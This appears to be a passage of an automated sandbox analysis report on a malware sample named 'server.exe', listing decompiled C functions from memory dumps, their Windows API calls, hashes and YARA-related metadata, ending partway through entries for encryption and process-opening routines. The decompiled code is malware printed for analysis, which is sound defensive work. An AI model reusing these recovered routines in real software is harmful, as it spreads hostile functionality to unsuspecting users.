Instruction Fuzzy Hash: 3521F832A407129BC731BA648C44A6B73F9EB48B58B150695FDAEDF240DB70C840DB58

Uniqueness

Uniqueness Score: -1.00%

Function 02B869E6 Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E02B869E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02B82A3D(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E02B828B3(_t23);
						}
					}
					return _t38;
				}
				if(E02B86ADC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2b8a34c, 1, 0,  *0x2b8a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02B85704(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02B84C94(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02B87220(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02B849D0( &_v32, _t39);
					goto L13;
				}
			}

0x02b869e6
0x02b869f3
0x02b869f9
0x02b869fa
0x02b869fb
0x02b869fc
0x02b869fd
0x02b86a01
0x02b86a0d
0x02b86a11
0x02b86a99
0x02b86a99
0x02b86a9c
0x02b86a9e
0x02b86aa6
0x02b86aac
0x02b86aaf
0x02b86aaf
0x02b86aac
0x02b86aba
0x02b86aba
0x02b86a24
0x02b86a26
0x02b86a26
0x02b86a3d
0x02b86a41
0x02b86a44
0x02b86a4f
0x02b86a56
0x02b86a56
0x02b86a5f
0x02b86a63
0x02b86a71
0x02b86a65
0x02b86a65
0x02b86a66
0x02b86a67
0x02b86a68
0x02b86a69
0x02b86a6a
0x02b86a6a
0x02b86a76
0x02b86a79
0x02b86a7d
0x02b86a7f
0x02b86a7f
0x02b86a86
0x00000000
0x02b86a88
0x02b86a88
0x02b86a95
0x00000000
0x02b86a95

APIs

CreateEventA.KERNEL32(02B8A34C,00000001,00000000,00000040,?,?,74AD3E00,00000000,74AD3E20), ref: 02B86A37
SetEvent.KERNEL32(00000000), ref: 02B86A44
Sleep.KERNEL32(00000BB8), ref: 02B86A4F
CloseHandle.KERNEL32(00000000), ref: 02B86A56

Part of subcall function 02B85704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02B86A76,?,02B86A76,?,?,?,?,?,02B86A76,?), ref: 02B857DE

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 1503f2f6fc65dfae66e1885ea62b1039b5c36e1527305960c5f87633b4f90425
Instruction ID: 6a74237c6b9599791a149ab00b634b01c67ab68638ed7e607b7a1cf3a98f558a
Opcode Fuzzy Hash: 1503f2f6fc65dfae66e1885ea62b1039b5c36e1527305960c5f87633b4f90425
Instruction Fuzzy Hash: 35218776D00119ABDF20BFE498849EE77BDEF04354B0584A5EA29A7200D7359985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B84461 Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02B84461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02B833DC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02b8446d
0x02b84471
0x02b84472
0x02b84473
0x02b84475
0x02b84477
0x02b8447a
0x02b8447f
0x02b84516
0x02b8451d
0x02b8451d
0x02b84488
0x02b8448f
0x02b8449f
0x02b8449f
0x02b844a5
0x02b844a7
0x02b844ac
0x02b844b5
0x02b844bb
0x02b844c0
0x02b844cb
0x02b844cf
0x02b844d1
0x02b844d2
0x02b844db
0x02b844df
0x02b844f0
0x02b844e1
0x02b844e6
0x02b844eb
0x02b844fa
0x02b844fa
0x02b844cf
0x02b84500
0x02b84506
0x02b84506
0x02b8450f
0x02b84514
0x02b84514
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02B8448F
lstrlenW.KERNEL32(?), ref: 02B844C5
memcpy.NTDLL(00000000,?,?,?), ref: 02B844E6
SysFreeString.OLEAUT32(?), ref: 02B844FA

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: fd896e89c94f4017bfaf34ccccf2997f7877b993073eaad9eb3c11f5e9c74f5a
Instruction ID: b8b42baae09a0a12b56c24f30d036524f2751b027effa6d7168c6fcabae3a9c9
Opcode Fuzzy Hash: fd896e89c94f4017bfaf34ccccf2997f7877b993073eaad9eb3c11f5e9c74f5a
Instruction Fuzzy Hash: 8F21307590060AEFCB11EFA4D9849DEBBF5FF49354B2481A9E90997300EB30DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B82708 Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02B82708(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2b8a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2b8a2f0; // 0x295bac27
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2b8a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02b82710
0x02b82713
0x02b82719
0x02b82731
0x02b82733
0x02b82738
0x02b8273a
0x02b8273d
0x02b8273f
0x02b82742
0x02b82744
0x02b82744
0x02b82746
0x02b82751
0x02b82756
0x02b82767
0x02b8276f
0x02b82774
0x02b82777
0x02b8277a
0x02b8277c
0x02b8277f
0x02b82782
0x02b82782
0x02b82785
0x02b82790
0x02b82795
0x02b8279f

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B86708,00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B82713
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B8272B
memcpy.NTDLL(00000000,05589610,-00000008,?,?,?,02B86708,00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B8276F
memcpy.NTDLL(00000001,05589610,00000001,02B83ECE,00000000,05589610), ref: 02B82790

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 29839a97ea9a0cf8cf8087606953018e296791184167cb2a864963a707da8f8c
Instruction ID: 3c6d79c29fad965aba3b09895767831acb914608949296419b1ac1bd4b541b39
Opcode Fuzzy Hash: 29839a97ea9a0cf8cf8087606953018e296791184167cb2a864963a707da8f8c
Instruction Fuzzy Hash: 301129B6E00214AFD7209F69DC84DAE7BEEEB803A0B1501B6F808D7240E7759E14D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 02B87843 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B87843(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02b8784d
0x02b87851
0x02b87866
0x02b87868
0x02b8786d
0x02b87873
0x02b87875
0x02b8787a
0x02b87885
0x02b8787c
0x02b8787c
0x02b8787c
0x02b8787a
0x02b87893

APIs

memset.NTDLL ref: 02B87851
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,74ACE5D0,00000000,00000000), ref: 02B87866
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B87873
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02B83F34,00000000,?), ref: 02B87885

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 729f27c09efef3d64126768f9307bc33a1247cd79e692d38a1eaba3b6144c841
Instruction ID: 3187b3f99da8e980b7b21e7fa3b269c93cafe7b38475063af633b4bd9b64af05
Opcode Fuzzy Hash: 729f27c09efef3d64126768f9307bc33a1247cd79e692d38a1eaba3b6144c841
Instruction Fuzzy Hash: 42F05EB550470C7FD7206F26DCC4C3BFBACEB8119CB214DBEF14A92211DA71A818DA60

Uniqueness

Uniqueness Score: -1.00%

Function 02B83230 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B83230() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2b8a30c; // 0x1c8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2b8a35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2b8a30c; // 0x1c8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2b8a2d8; // 0x5190000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02b83230
0x02b83237
0x02b83281
0x02b83283
0x02b83283
0x02b8323b
0x02b83241
0x02b83246
0x02b8324a
0x02b83250
0x02b83257
0x00000000
0x00000000
0x02b83259
0x02b8325e
0x00000000
0x00000000
0x00000000
0x02b8325e
0x02b83260
0x02b83268
0x02b8326b
0x02b8326b
0x02b83271
0x02b83278
0x02b8327b
0x02b8327b
0x00000000

APIs

SetEvent.KERNEL32(000001C8,00000001,02B8109A), ref: 02B8323B
SleepEx.KERNEL32(00000064,00000001), ref: 02B8324A
CloseHandle.KERNEL32(000001C8), ref: 02B8326B
HeapDestroy.KERNEL32(05190000), ref: 02B8327B

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 6a66c753a68fb0d368c12a189df90c59a7b3b36b8939d7efd74380d30b7338ef
Instruction ID: a63d9365456f1e0479dfdaaee05877b3abbe8959deec4cc1db7ba11bf842ee0d
Opcode Fuzzy Hash: 6a66c753a68fb0d368c12a189df90c59a7b3b36b8939d7efd74380d30b7338ef
Instruction Fuzzy Hash: D4F01C75E8075197DF20AE759D88A5237D8EB04AE5B044990FD4CE7280DB20D450DA61

Uniqueness

Uniqueness Score: -1.00%

Function 02B8607C Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02B8607C() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2b8a3cc; // 0x5589610
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2b8a3cc; // 0x5589610
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2b8a3cc; // 0x5589610
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2b8b142) {
					HeapFree( *0x2b8a2d8, 0, _t10);
					_t7 =  *0x2b8a3cc; // 0x5589610
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02b8607c
0x02b86085
0x02b86095
0x02b86095
0x02b8609a
0x02b8609f
0x00000000
0x00000000
0x02b8608f
0x02b8608f
0x02b860a1
0x02b860a6
0x02b860aa
0x02b860bd
0x02b860c3
0x02b860c3
0x02b860cc
0x02b860ce
0x02b860d2
0x02b860d8

APIs

RtlEnterCriticalSection.NTDLL(055895D0), ref: 02B86085
Sleep.KERNEL32(0000000A), ref: 02B8608F
HeapFree.KERNEL32(00000000), ref: 02B860BD
RtlLeaveCriticalSection.NTDLL(055895D0), ref: 02B860D2

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 80fdd653e231e5d682e6c8d84fcce8b88e227314286308d743abd53965507efc
Instruction ID: 06ae2cda2642137d35e70fdbdd2fa5fb6aa49139406a19ca4ecf938b8bd8365e
Opcode Fuzzy Hash: 80fdd653e231e5d682e6c8d84fcce8b88e227314286308d743abd53965507efc
Instruction Fuzzy Hash: 48F0FE74A806019FEB19EF54DC89B2537B5EB44381B048846E90EDB390D734A864DA19

Uniqueness

Uniqueness Score: -1.00%

Function 02B82058 Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02B82058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02B833DC(_t2);
				if(_t34 != 0) {
					_t30 = E02B833DC(_t28);
					if(_t30 == 0) {
						E02B861DA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02B87AE9(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02B87AE9(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02b82058
0x02b82062
0x02b82064
0x02b8206a
0x02b8206a
0x02b82073
0x02b82077
0x02b82083
0x02b82087
0x02b820fb
0x02b82089
0x02b82089
0x02b8208d
0x02b82092
0x02b82097
0x02b820b1
0x02b820a0
0x02b820a0
0x02b820a4
0x02b820a7
0x02b820ac
0x02b820ac
0x02b820b6
0x02b820de
0x02b820e4
0x02b820e7
0x02b820b8
0x02b820ba
0x02b820c2
0x02b820cd
0x02b820d2
0x02b820d2
0x02b820ee
0x02b820f5
0x02b820f6
0x02b820f6
0x02b82087
0x02b82106

APIs

lstrlen.KERNEL32(00000000,00000008,?,74AC4670,?,?,02B851F7,?,?,?,?,00000102,02B821E7,?,?,74ACE5D0), ref: 02B82064

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

Part of subcall function 02B87AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02B82092,00000000,00000001,00000001,?,?,02B851F7,?,?,?,?,00000102), ref: 02B87AF7
Part of subcall function 02B87AE9: StrChrA.SHLWAPI(?,0000003F,?,?,02B851F7,?,?,?,?,00000102,02B821E7,?,?,74ACE5D0,00000000), ref: 02B87B01

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B851F7,?,?,?,?,00000102,02B821E7,?), ref: 02B820C2
lstrcpy.KERNEL32(00000000,00000000), ref: 02B820D2
lstrcpy.KERNEL32(00000000,00000000), ref: 02B820DE

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 7be031b0434d9877230debd79d10bec81e9c8df44f229e9e3909cdeddad5a2e0
Instruction ID: 94e491b06fd9c316dcf5e322cd9cff9277b2de6904c875ea182507782438c245
Opcode Fuzzy Hash: 7be031b0434d9877230debd79d10bec81e9c8df44f229e9e3909cdeddad5a2e0
Instruction Fuzzy Hash: A6219D76504295EFCB12BFA4CC44AAABFBAEF05694B148094FD0D9B201DB35DA41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B85DE4 Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B85DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02B833DC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02b85df9
0x02b85dfd
0x02b85e07
0x02b85e0c
0x02b85e11
0x02b85e13
0x02b85e1b
0x02b85e20
0x02b85e2e
0x02b85e33
0x02b85e3d

APIs

lstrlenW.KERNEL32(004F0053,?,74AC1A70,00000008,05589280,?,02B852D0,004F0053,05589280,?,?,?,?,?,?,02B868B6), ref: 02B85DF4
lstrlenW.KERNEL32(02B852D0,?,02B852D0,004F0053,05589280,?,?,?,?,?,?,02B868B6), ref: 02B85DFB

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

memcpy.NTDLL(00000000,004F0053,74AC4710,?,?,02B852D0,004F0053,05589280,?,?,?,?,?,?,02B868B6), ref: 02B85E1B
memcpy.NTDLL(74AC4710,02B852D0,00000002,00000000,004F0053,74AC4710,?,?,02B852D0,004F0053,05589280), ref: 02B85E2E

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: ab22b50117ff948324369a5182f49773d6e11c9ef14228a0a2c189063d8f4af2
Instruction ID: 796bdfac412e662092171964d978282b372e74f747f0f74734d80f01fecac97c
Opcode Fuzzy Hash: ab22b50117ff948324369a5182f49773d6e11c9ef14228a0a2c189063d8f4af2
Instruction Fuzzy Hash: 9FF04F72900119BBCF11EFA8CC84CDE7BADEF0839475140A2ED08D7201E735EA10CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B87563 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05589C00,00000000,00000000,00000000,02B83EF9,00000000), ref: 02B87573
lstrlen.KERNEL32(?), ref: 02B8757B

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

lstrcpy.KERNEL32(00000000,05589C00), ref: 02B8758F
lstrcat.KERNEL32(00000000,?), ref: 02B8759A

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 19d04f483ab37ce7dec64f6acee679651863eeb7cc9c0a97b69fb125dcb93220
Instruction ID: ca728e08eccd4beb9d471600812b2fbbe629361c0d2cf1af1bb086f52f4351bf
Opcode Fuzzy Hash: 19d04f483ab37ce7dec64f6acee679651863eeb7cc9c0a97b69fb125dcb93220
Instruction Fuzzy Hash: 33E09B33901520AB8B116BA49C48C6FF7BDFF896903044856F608D3200C7359811DBA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: server.exePID: 6832, Parent PID: 3840COMMON

Executed Functions

Function 02BE1508 Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 02BE1540
memcpy.NTDLL(?,?,00000010), ref: 02BE1559
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,?), ref: 02BE1582
CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 02BE159A
memcpy.NTDLL(00000000,?,?,?), ref: 02BE15EC
CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000020,?,?,?), ref: 02BE1615
GetLastError.KERNEL32(?,?,?), ref: 02BE1644
GetLastError.KERNEL32 ref: 02BE1676
CryptDestroyKey.ADVAPI32(?), ref: 02BE1682
GetLastError.KERNEL32 ref: 02BE168A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02BE1697
GetLastError.KERNEL32 ref: 02BE169F

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: a1c790b0b9f6c38a95ff4d0fd150b2cac3b21f93c7292e75327222df3e8dcd57
Instruction ID: d065347eb1d064bd26500fafc1f9884f625b9cb4bb26191b0a158b24e6f76932
Opcode Fuzzy Hash: a1c790b0b9f6c38a95ff4d0fd150b2cac3b21f93c7292e75327222df3e8dcd57
Instruction Fuzzy Hash: 14513AB1910208EFDF10DFA8D884AAE7BB9FB48354F1484A9F91AE7141D7708E54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02BE421F Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02BE4266
